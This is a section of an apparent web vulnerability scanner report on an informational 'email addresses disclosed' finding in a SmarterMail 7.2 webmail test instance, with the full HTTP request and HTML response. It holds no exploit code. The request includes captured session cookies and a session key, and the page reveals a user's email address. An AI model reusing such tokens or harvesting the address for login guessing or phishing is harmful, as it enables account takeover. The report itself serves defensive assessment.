7. Email addresses disclosed  previous  next
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://vulnerable.smartermail.site:9998/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/frmError.aspx?aspxerrorpath=/UserControls/Popups/frmAddFileStorageFolder.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState={"FileRootFoldertestme-baseline":"true"}; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:25:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 29909


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type='text/javascript'>
       if (parent.UpdateSection != null)
           parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Root " dir="ltr">
   
<table id="loadingMessage" class="LoadingMessageTable">
   <tr>
       <td class="LoadingMessageCell">
           <div class="LoadingShadowBox">
               <div class="LoadingMessage">
                   <div class="PageTitle">
                       <div class="RoundedPageTitleLeft">
                           <div class="RoundedPageTitleRight">
                               <img id="ctl00_ctl00_Image1" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
                               <div class="PageTitleText">
                                   Processing</div>
                           </div>
                       </div>
                   </div>
               </div>
               <div class="RoundedBottom">
                   <div class="RoundedLeft">
                       <div class="RoundedRight">
                           <div class="RoundedBottomLeft">
                               <div class="RoundedBottomRight">
                                   <div class="LoadingMessageInner">
                                       <div class="LoadingMessageText">
                                           SmarterMail is loading...</div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       </td>
   </tr>
</table>
<div class="LoadingGlyph" id="TopBarLoading" style="display: none">
   <img id="ctl00_ctl00_Image2" src="/App_Themes/Default/images/misc/loadingindicator.gif" style="border-width:0px;" />
</div>

   <form method="post" action="Default.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA/AQKKvJgVAw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
function ShowHelpRadWindow(){ SpawnHyperWindow('/UserControls/Popups/frmHelp.aspx?url=' + escape(HelpID) + '&extraInfo=' + escape(ExtraHelpID) + '', 330, 200, null); }//]]>
</script>

<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="Services/svcSuperHyperGrid.asmx/js" type="text/javascript"></script>
<script src="Services/svcRealTimeService.asmx/js" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$Split$LP$StyledUpdatePanel1'], ['ctl00$Split$LP$lnkUpdate'], [], 90);
//]]>
</script>


       <script type="text/javascript">
           self.GetUpdatesFunc = SMWeb.Services.svcRealTimeService.GetUpdates;
           self.EnableAnimations = false;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask=Specific/root"></script>
       <div class="PageHeader" id="PageHeader">
           <div class="PageHeaderText">
               <div class="PageHeaderActions">
                   
                   <span id="ctl00_HA"><span class="HeaderUserName">testit@hoytllc.com</span> | <span class="HeaderAlerts"><a id="HeaderAlertsLink" href="javascript:GenericPopup('/Main/Alerts/frmAlertPopup.aspx', 'AlertsPopup', 'width=600,height=500,resizable=no,scrollbars=no,status=no,toolbar=no');">Reminders</a></span> | <span class="HeaderLogOut"><a href="/Logout.aspx" target="_self" >Logout</a></span> | <span class="HeaderHelp"><a href="javascript:ShowHelpRadWindow()">Help</a></span></span>
               </div>
               <div class="PageHeaderVersion" id="PageHeaderVersion">
                   SmarterMail Free 7.2
               </div>
           </div>
       </div>
       
<!-- HyperSplitter -->
<div class='hsOuter ' id='ctl00_Split' style='visibility:hidden'>
<table class='hsContainer' id='ctl00_Split_Container'>
   <tr>
       <td class='hsHorizontal Sidebar' id='ctl00_Split_SB' style='width:46px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SB_Content'>
               
               <div class="SidebarWrapper"><div id="SidebarScrollUp" class="SidebarScrollUp"><a></a></div><div id="SidebarScroller" class="SidebarScroller">

<div id="SidebarIcon_UserEmail" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserEmail" href="/Default.aspx?section=UserEmail" onclick="UpdateSection('UserEmail', '/Main/frmToday.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Email</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserContacts" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserContacts" href="/Default.aspx?section=UserContacts" onclick="UpdateSection('UserContacts', '/Main/frmEmptyPreviewOuter.aspx?type=contacts', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Contacts</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserCalendar" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserCalendar" href="/Default.aspx?section=UserCalendar" onclick="UpdateSection('UserCalendar', '/Main/frmCalendar.aspx', true, true); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Calendar</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserTasks" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserTasks" href="/Default.aspx?section=UserTasks" onclick="UpdateSection('UserTasks', '/Main/frmEmptyPreviewOuter.aspx?type=tasks', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Tasks</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserNotes" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserNotes" href="/Default.aspx?section=UserNotes" onclick="UpdateSection('UserNotes', '/Main/frmEmptyPreviewOuter.aspx?type=notes', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Notes</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSync" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSync" href="#" onclick="SpawnHyperWindow('/UserControls/Popups/frmDeviceSync.aspx', 700, 420);">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Synchronization Center</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserRSS" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserRSS" href="/Default.aspx?section=UserRSS" onclick="UpdateSection('UserRSS', '/Main/frmRSSList.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>RSS Feeds</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserStorage" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserStorage" href="/Default.aspx?section=UserStorage" onclick="UpdateSection('UserStorage', '/Main/frmStoredFiles.aspx?path=Root+Folder%5c', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>File Storage</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserReports" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserReports" href="/Default.aspx?section=UserReports" onclick="UpdateSection('UserReports', '/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Reports</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserEvents" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserEvents" href="/Default.aspx?section=UserEvents" onclick="UpdateSection('UserEvents', '/Main/Alerts/frmAlerts.aspx?level=user', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Events</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSettings" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSettings" href="/Default.aspx?section=UserSettings" onclick="UpdateSection('UserSettings', '/Main/frmMySettings.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Settings</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSearch" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSearch" href="/Default.aspx?section=UserSearch" onclick="UpdateSection('UserSearch', '/Main/frmAdvancedSearchResults.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Advanced Search</div></div></div>
   </a>
</div>
</div><div id="SidebarScrollDown" class="SidebarScrollDown"><a></a></div></div>

           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_LP' style='width:250px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_LP_Content'>
               
               <div id="ctl00_Split_LP_StyledUpdatePanel1">
                   
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Email
           </div>
       </div>
   </div>
</div>
<div class="ButtonBar">
   
<!-- HyperMenu -->
                   <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_LP_ctl01_menuMailContext' name='ctl00$Split$LP$ctl01$menuMailContext' style='z-index:800'>
                       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuMailContext_menuAdd' style='z-index: 800'><a class='hmA' href='#'>New Folder</a></li>
                       <li class='hmItem' id='ctl00_Split_LP_ctl01_menuMailContext_menuEdit' style='z-index: 800'><a class='hmA' href='#'>Rename Folder</a></li>
                       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuMailContext_menuDelete' style='z-index: 800'><a class='hmA' href='#'>Delete Folder</a></li>
                   </ul>
                   <div class='hmScrollDown'></div></div>
                   </div>
                   
   
<!-- HyperMenu -->
                   <div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuMailActions' name='ctl00$Split$LP$ctl01$menuMailActions' style='z-index:800'>
                       <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
                       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                           <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew_941686878b5e4776b1467fe58b26eae2' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
                           <li class='hmItem' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew_3fd16a818a0d4d71b1f9a4c1cc7ef199' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
                           <li class='hmItem' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew_39292b12b1044b82966fd25b895f72f8' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
                           <li class='hmItem' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew_dedd23c38db948e69af128d2da1b78e4' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
                           <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuMailActions_menuGlobalNew_f9393a5c437c455fa23b56084bfe248c' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
                       </ul><div class='hmScrollDown'></div></div>
                       </li>
                       <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuMailActions_menuMailActionsMenu' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
                       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                           <li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuMailActions_menuMailActionsMenu_menuAdd' style='z-index: 800'><a class='hmA' href='#'>New Folder</a></li>
                           <li class='hmItem' id='ctl00_Split_LP_ctl01_menuMailActions_menuMailActionsMenu_menuEdit' style='z-index: 800'><a class='hmA' href='#'>Rename Folder</a></li>
                           <li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuMailActions_menuMailActionsMenu_menuDelete' style='z-index: 800'><a class='hmA' href='#'>Delete Folder</a></li>
                       </ul><div class='hmScrollDown'></div></div>
                       </li>
                   </ul>
                   </div>
                   <div class='hmClear'><!-- --></div>
                   
</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
                   <div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeMail'>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeMail_htv0'canedit="false"TTUID="MFMyTodayPage" >
                           <div class='htvLineFirst'>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/today.gif' /><a class='htvA' href='#'>My Today Page</a>
                           </div>
                       </li>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeMail_htv1'canedit="false"folder="Inbox"name="Inbox"TTUID="MFInbox" >
                           <div class='htvLine'>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/inbox.gif' /><a class='htvA' href='#'><span id='fl-1140420008'>Inbox</span></a>
                           </div>
                       </li>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeMail_htv2'canedit="false"TTUID="MFFollow&#x2d;ups" >
                           <div class='htvLine'>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/MessageFlagIndicatorOn.gif' /><a class='htvA' href='#'>Follow-ups</a>
                           </div>
                       </li>
                       <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeMail_htv3'canedit="false"TTUID="MFLinkedtoTasks" >
                           <div class='htvLineLast'>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/tasks.gif' /><a class='htvA' href='#'>Linked to Tasks</a>
                           </div>
                       </li>
                   </ul></div>
                   
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
   <span id="ctl00_Split_LP_ctl01_lblUsage" class="FooterSummary">0 MB used of 100 MB</span>
</div>


   <script type="text/javascript">
       function IsSystemFolder() {
           var selectedNode = $('#ctl00_Split_LP_ctl01_treeMail').getSelectedTreeNode();
           if (!selectedNode || !selectedNode.attr('folder') || (selectedNode && selectedNode.attr('canedit') == "false")) {
               ShowAlertWindow('This\x20item\x20can\x20not\x20be\x20renamed\x20or\x20deleted\x2e');
               return true;
           }
           return false;
       }
       function FindAndSelectFolder(folderName) {
           $('#ctl00_Split_LP_ctl01_treeMail li').each(function() {
               if ($(this).attr('folder') == folderName)
                   $(this).selectHyperTreeNode();
           });
       }
       function GetSelectedFolder() {
           var selectedNode = $('#ctl00_Split_LP_ctl01_treeMail').getSelectedTreeNode();
           if (!selectedNode) return "undefined";
           return selectedNode.attr('folder');
       }
       self.MailTreeView = "ctl00_Split_LP_ctl01_treeMail";
       if (self.ResizeLeftBar) ResizeLeftBar();
   </script>



               </div>
               
               <a id="ctl00_Split_LP_lnkUpdate" href="javascript:__doPostBack('ctl00$Split$LP$lnkUpdate','')"></a>
               <input type="hidden" name="ctl00$Split$LP$SessionKey" id="ctl00_Split_LP_SessionKey" value="46381571adc945daba1f01f20f50e2a1" />
           </div>
       </td>
       <td class='hsHorizontal Splitter' id='ctl00_Split_SplitBar' style='width:2px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SplitBar_Content'>
               
           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_Frame' style=''>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_Frame_Content'>
               
               <iframe id="ctl00_Split_Frame_ContentFrame" frameborder="0" scrolling="no" src="/Main/frmToday.aspx" style="width: 100%; border: none"></iframe>
               
           </div>
       </td>
   </tr>
</table>
</div>

       <div class="PageFooter" id="PageFooter">
       </div>
       <input type="hidden" name="ctl00$PageTitle" id="ctl00_PageTitle" />
       <input type="hidden" name="ctl00$PanelLoadedState" id="ctl00_PanelLoadedState" value="{}" />

       <script type="text/javascript">
           self.LBHidden = false;
           var panelLoadedStateObj = $get('ctl00_PanelLoadedState');
           var processingText = "Processing";
           var loadingText = "SmarterMail is loading...";
           var currentSection = 'UserEmail';
           var sidebarHeight = 0;
           var firstResize = true;
           var pageTitleId = 'ctl00_PageTitle';
           var $sup = $('#ctl00_Split_LP_StyledUpdatePanel1');
           var $scrollers = $('#SidebarScrollUp, #SidebarScrollDown');
           var $splitter = $('#ctl00_Split');
           var $sbs = $('#SidebarScroller');
           var $sbw = $sbs.parent();
           var $sbwp = $sbw.parent();
           var _extContentElement = $get('ctl00_Split_Frame_ContentFrame');
           function GetSMPane() { return self; }
           function Update(name) {
               $get(pageTitleId).value = document.title;
               SetCookieValue("TopBarSection", name);
               __doPostBack('ctl00$Split$LP$lnkUpdate',name + "|" + currentPage);
               currentSection = name;
               UpdateHash();
           }
           NavigateToHash();
           function HideLeftBar(val) {
               if (val === undefined) return;
               if (self.LBHidden == val) return;
               self.LBHidden = val;
               if (val) $('#ctl00_Split_LP, #ctl00_Split_SplitBar').HideHyperPane();
               else $('#ctl00_Split_LP, #ctl00_Split_SplitBar').ShowHyperPane();
               UpdateHash();
           }
           function SplitterResized() {
               ResizeLeftBar(true);
               ResizeIframes();
           }
           function ResizeLeftBar(setWidth) {
               if (firstResize) {
                   firstResize = false;
                   $scrollers.hide();
                   sidebarHeight = $sbs.outerHeight();
                   $sbw.height(sidebarHeight);
                   InitSidebarSliders();
               }

               $sup.ResizeToFit();
               var $ls = $('#LeftScrollable');
               $ls.parent().css('overflow','hidden');
               $ls.ResizeToFit();
               $ls.parent().css('overflow','visible');

               if (setWidth) {
                   var width = $sup.GetResizedWidth();
                   $sup.width(width);
                   $ls.width(width);
               }
               if (self.AdditionalResizeLeftBar) self.AdditionalResizeLeftBar();

               if ($sbwp.innerHeight() < sidebarHeight) {
                   $scrollers.show();
                   $sbw.ResizeToFit();
                   $sbs.ResizeToFit();
               }
               else if ($scrollers.is(':visible')) {
                   $scrollers.hide();
                   $sbw.height(sidebarHeight);
                   $sbs.height(sidebarHeight);
                   $sbs.scrollTop(0);
               }
           }
           function InitSidebarSliders() {
               var animationTime = self.EnableAnimations ? 150 : 0;
               $('.SidebarSlider').each(function() {
                   var control = $(this);
                   var wrapper = control.parent();
                   var parent = control.parent().parent();
                   var off = parent.offset();
                   control.children('div').css('float','none');
                   var width = control.innerWidth(true);
                   control.children('div').css('float','right');
                   control.add(wrapper).css({ top: off.top - 1, left: off.left + parent.outerWidth(true), width: 0, visibility: 'visible'}).hide();
                   var timer;
                   parent.hover(function() {
                       clearTimeout(timer);
                       parent.addClass('SidebarAnchorHover');
                       var off = parent.offset();
                       control.add(wrapper).css({ top: off.top - 1});
                       control.add(wrapper).stop().show().animate({ width: width}, animationTime, function () { wrapper.width(width+1); });
                   }, function() {
                       clearTimeout(timer);
                       timer = setTimeout(function () { control.add(wrapper).stop().animate({ width: 0}, animationTime, function () { control.add(wrapper).hide(); parent.removeClass('SidebarAnchorHover'); }); } , 66);
                   });
               });
           }
           function DoResize() {
               $splitter.ResizeHyperSplitter();
               ResizeLeftBar();
               ResizeIframes();
           }
           $(window).resize(function() { clearTimeout(self.resizeDelay); self.resizeDelay = setTimeout(DoResize, 100); });
           $(window).load(function() {
               InitAjaxHandlers();
               ShowSection(currentSection, currentSection);
               Initialize();
               DoResize();
               setTimeout(function() { $('#loadingMessage').hide(); }, self.isNavigatingToHash ? 500 : 250);
           });
       </script>

       
<table style="position: absolute; display: none;" class="DragDropDiv" id="DragDropDiv">
   <tr>
       <td class="DragDropImg">
           <img src="s.gif" style="height:24px;width:24px;border-width:0px;" />
       </td>
       <td class="DragDropDivText HyperGrid">
           <div id="DragDropDivText">
           </div>
       </td>
   </tr>
</table>

       
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_DC1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_DC1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_DC1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

       
   

<script type="text/javascript">
//<![CDATA[
ClearTreeToggle();
if (self.LeftBarReady) self.LeftBarReady();var confirmationDialogKeys = new Object();
confirmationDialogKeys['@Delete'] = 'Are you sure you want to delete the <span id="DeleteConfirmCount">0</span> selected item(s)?';
confirmationDialogKeys['@GenericDelete'] = confirmationDialogKeys['@Delete'];
confirmationDialogKeys['@DeleteConfirm'] = 'Are you sure you want to delete all messages in the current folder?';
confirmationDialogKeys['@PurgeConfirm'] = 'Are you sure you want to purge all messages marked for deletion from this folder?';
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
$(function() { $('#ctl00_Split').hyperSplitter({"IsHorizontal":true,"Panes":[{"Resizable":false,"SplitBar":false,"MinWidth":46,"MaxWidth":46,"Width":46,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SB"},{"Resizable":true,"SplitBar":false,"MinWidth":185,"MaxWidth":300,"Width":250,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":"RootLPSize","_ClientID":"ctl00_Split_LP"},{"Resizable":false,"SplitBar":true,"MinWidth":2,"MaxWidth":2,"Width":2,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SplitBar"},{"Resizable":false,"SplitBar":false,"MinWidth":0,"MaxWidth":0,"Width":0,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_Frame"}]}); });
$(function() { $('#ctl00_Split_LP_ctl01_menuMailContext').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuMailContext_menuAdd":"SpawnHyperWindow(\u0027/UserControls/Popups/frmAddFolder.aspx?parent=\u0027 + encodeURIComponent(GetSelectedFolder()), 350, 150);","ctl00_Split_LP_ctl01_menuMailContext_menuEdit":"if (IsSystemFolder()) return; SpawnHyperWindow(\u0027/UserControls/Popups/frmFolderRename.aspx?folder=\u0027 + encodeURIComponent(GetSelectedFolder()), 350, 150);","ctl00_Split_LP_ctl01_menuMailContext_menuDelete":"if (IsSystemFolder()) return; SpawnHyperWindow(\u0027/UserControls/Popups/frmDeleteConfirm.aspx?folder=\u0027 + encodeURIComponent(GetSelectedFolder()), 350, 150);"},"ClientCallbacks":{}}); });
